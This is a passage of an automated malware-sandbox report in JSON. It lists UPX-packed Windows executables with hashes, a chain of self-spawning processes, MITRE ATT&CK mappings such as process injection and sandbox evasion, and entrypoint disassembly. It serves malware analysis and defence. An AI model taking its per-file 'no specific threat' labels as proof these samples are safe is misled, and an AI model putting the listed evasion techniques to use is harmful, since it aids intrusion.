"runtime_process": "jjjhv.exe (PID: 4048)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxxvtvn.exe", "file_path": "C:\\lxxvtvn.exe", "file_size": 342983, "sha256": "be0b366d2db2119135514576da2f817b7500935f9f89730661806eab28aae238", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lxxvtvn.exe (PID: 1796)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nbvdjp.exe", "file_path": "C:\\nbvdjp.exe", "file_size": 342956, "sha256": "9a9d91c4b07a55bc8d42e65c2cea9c1cd7a7a0dc8baf16faf776ec816ac5d072", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jfnlx.exe (PID: 1844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "njhfl.exe", "file_path": "C:\\njhfl.exe", "file_size": 342536, "sha256": "66cfec2454a0216b8963506ba40c3dd14168669db396f58a8f424909a1180356", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00062.exe (PID: 5896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ntxjntx.exe", "file_path": "C:\\ntxjntx.exe", "file_size": 343028, "sha256": "c2b3c4793ac8aa4b69994cdf97cbc3015155223ea8636b53adba590be47e25bc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ntxjntx.exe (PID: 4544)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pnxhn.exe", "file_path": "C:\\pnxhn.exe", "file_size": 343125, "sha256": "ffd31dfb904abe752d1c90ba20030aa437011ebe301eb4f63fc686d2501851e2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pnxhn.exe (PID: 3844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pppjrfj.exe", "file_path": "C:\\pppjrfj.exe", "file_size": 342778, "sha256": "3f80921fd4371c8dba72c3b7d41f85c9878c232a2917c00a097241b305e1db9e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xfllptv.exe (PID: 3276)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rdjtrt.exe", "file_path": "C:\\rdjtrt.exe", "file_size": 343010, "sha256": "a1816e5fb5067b51954aebbd1f8b19d62b8e0e01439003ab6e903c419384479a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dtndd.exe (PID: 4224)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rdrhhx.exe", "file_path": "C:\\rdrhhx.exe", "file_size": 342972, "sha256": "7883729e88a8a7c423e316bf82ff67af1543bfbc72f37de024c9ed86ac90ad38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rdrhhx.exe (PID: 4364)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhxdb.exe", "file_path": "C:\\rhxdb.exe", "file_size": 343156, "sha256": "dcd0e6bec63d0d8f864e6adfe89ce72db4a4cd63e7719bc88f573a929ec44dd5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4202648.exe (PID: 3700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rpnxll.exe", "file_path": "C:\\rpnxll.exe", "file_size": 343344, "sha256": "2dddb9dd008ccdc204717beaf9998e12e7db154b5fc5e71a09ea25760940c8bf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rrhrlx.exe (PID: 1116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rrhrlx.exe", "file_path": "C:\\rrhrlx.exe", "file_size": 343334, "sha256": "155c84d6f17969cc6405064587ebea91aac2a3a108285634205a04d5c8c35949", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rrhrlx.exe (PID: 1116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tbxtf.exe", "file_path": "C:\\tbxtf.exe", "file_size": 343095, "sha256": "2565f2f3fb0bf51a29c6cbb509a10574ba2f95b7fab9364d47e523d31b2e103a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tbxtf.exe (PID: 1228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tjjhnh.exe", "file_path": "C:\\tjjhnh.exe", "file_size": 342846, "sha256": "8f7d66957f3f1a49ccbeb857413dbd3c2867d21dd196d821bd207a9e897298c1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjjhnh.exe (PID: 4492)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tjtvdt.exe", "file_path": "C:\\tjtvdt.exe", "file_size": 342789, "sha256": "b40877ade9ac4afbd6948f5ffe7af971f56b2af2ab63eeeabdfefa287a91b90c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjtvdt.exe (PID: 2700)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vlhdl.exe", "file_path": "C:\\vlhdl.exe", "file_size": 343358, "sha256": "81af9c1983e9066b0341edd5b93d522d36978f00dfa69254520b2c4f073b8112", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rpnxll.exe (PID: 3304)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vxjvbn.exe", "file_path": "C:\\vxjvbn.exe", "file_size": 343111, "sha256": "182ca910dc7e28fd1c608cbfc8b4f3870b183b44a768a6e34ab690199bca3ecf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tbxtf.exe (PID: 1228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xbxthhr.exe", "file_path": "C:\\xbxthhr.exe", "file_size": 342609, "sha256": "d19244a0a05d59233ce2d44077ddda5a91316095a4a227e447c5fa860c59e63f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "48866.exe (PID: 4236)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xfllptv.exe", "file_path": "C:\\xfllptv.exe", "file_size": 342765, "sha256": "6896f8ff6e95414aea9a78e4a839c7e3262880a6b9b27a98767a3986ca71a502", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dbhbvhd.exe (PID: 4092)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xldxxbf.exe", "file_path": "C:\\xldxxbf.exe", "file_size": 342918, "sha256": "63f58f6d73fcfad2a8c4d7f900f8754cacb6d6dbb1d1d1c6eb86a2164087f182", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "206828.exe (PID: 2776)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pltvbn.exe", "file_size": 343637, "sha256": "ba95203b7f023dbb1d00f385e917e079bdecd7be9590627fdc95ff957fc6b493", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "npdthpv.exe", "file_size": 343626, "sha256": "82615d352d96ac01eb9e63fc98d650096dada9327d4ce9e50a3d7fdaca26775a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dhtjtp.exe", "file_size": 343606, "sha256": "ff55fb384b56224628d95093a98a757b47bbdc706d2d933efe5a075d6d80d48d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nfrbnh.exe", "file_size": 343587, "sha256": "ff6fa7d2bcff23018fef07a88f008d3752eaeec2dc6e5e78e54c6485b11a5634", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "00068.exe", "file_size": 343575, "sha256": "dd830ad4dafdcf97c56d125b352dcabe2433e4c20dfdecf66e04a1da32e78527", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "840262.exe", "file_size": 343556, "sha256": "d2b29b86b06c46e248dd3bd28965663bd7e8945cd9169a8955b4cacd42fccfd7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4880662.exe", "file_size": 343543, "sha256": "3c5c658af3e74f6c72cc10426e58cd645e4f5ed93299b610f37880fb61d7f53e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "28028.exe", "file_size": 343533, "sha256": "757e3527dcf0aaebf414d23bc7a5c3a739b1f2960a28c6690cd0ac7f482f6964", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "040202.exe", "file_size": 343518, "sha256": "0ae9b2332f33317d34c99ab827222f1400b68d5d166d2a5a889dda8f246e2066", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rtbxtx.exe", "file_size": 343503, "sha256": "bc1deec506584f0bbeb1c772fa7a96a65fcd19eadf5598d9c85e6e9c5b2c18d1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0228228.exe", "file_size": 343490, "sha256": "161bc7f03ec832de9461481feff934df97e0f8283e094598f57a633067d7aac0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "080844.exe", "file_size": 343476, "sha256": "3665a9f7fc398ca35dfc422503a36887d5533ed8f0cc5ea083d9d90bdc1a143d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "046220.exe", "file_size": 343461, "sha256": "c04f9ea4bc1f05c6cebdee1043a65028bd580e98447defc0ee4e9aced7a5b0a6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "86682.exe", "file_size": 343449, "sha256": "16921ee80e5994e3e850312dcf4cf43a4fa5003935dbf4474b148249a5beba8b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005968", "name": "c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe", "normalized_path": "C:\\c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe", "sha256": "c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa"}, {"uid": "00000000-00003744", "parentuid": "00000000-00005968", "name": "24680.exe", "normalized_path": "c:\\24680.exe", "sha256": "98881c72d47854341d9c827487a8258d04944a85e51477664859b13e95a971cb"}, {"uid": "00000000-00005964", "parentuid": "00000000-00003744", "name": "2428202.exe", "normalized_path": "c:\\2428202.exe", "sha256": "0bccf0bf3abb8166165f50a823fc6a0e7bec802f838399960dff43e192dd1d50"}, {"uid": "00000000-00005896", "parentuid": "00000000-00005964", "name": "00062.exe", "normalized_path": "c:\\00062.exe", "sha256": "838f5979947cdaad7f78e7b4d97909dbf77aabad25b829393704b0008e0be7ce"}, {"uid": "00000000-00004296", "parentuid": "00000000-00005896", "name": "njhfl.exe", "normalized_path": "c:\\njhfl.exe", "sha256": "66cfec2454a0216b8963506ba40c3dd14168669db396f58a8f424909a1180356"}, {"uid": "00000000-00004244", "parentuid": "00000000-00004296", "name": "66840.exe", "normalized_path": "c:\\66840.exe", "sha256": "23d43b008e79370243fa135a0d1ede7b84a812cbbc1f9810856588044e990ebf"}, {"uid": "00000000-00004340", "parentuid": "00000000-00004244", "name": "60064.exe", "normalized_path": "c:\\60064.exe", "sha256": "57579ecc201379224bdba2ac61476de87215ca8f9e04b89f171076c073b9ca3a"}, {"uid": "00000000-00006120", "parentuid": "00000000-00004340", "name": "2288488.exe", "normalized_path": "c:\\2288488.exe", "sha256": "79abda481e45dd5daeb3c6d5b42b809ce5887568dca9c85ae6fb715207c7cb69"}, {"uid": "00000000-00004236", "parentuid": "00000000-00006120", "name": "48866.exe", "normalized_path": "c:\\48866.exe", "sha256": "2cb6626e9f456cd67aa95894544ea5619a7aa821c46740efa5754889511ddad9"}, {"uid": "00000000-00005860", "parentuid": "00000000-00004236", "name": "xbxthhr.exe", "normalized_path": "c:\\xbxthhr.exe", "sha256": "d19244a0a05d59233ce2d44077ddda5a91316095a4a227e447c5fa860c59e63f"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pltvbn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"npdthpv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dhtjtp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nfrbnh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"00068.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"840262.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4880662.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"28028.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"040202.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rtbxtx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0228228.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"080844.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"046220.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"86682.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4042804.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"048424.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"802262.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"848084.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0406488.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vlhdl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rpnxll.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rrhrlx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dpdrtr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"224404.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pltvbn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"npdthpv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 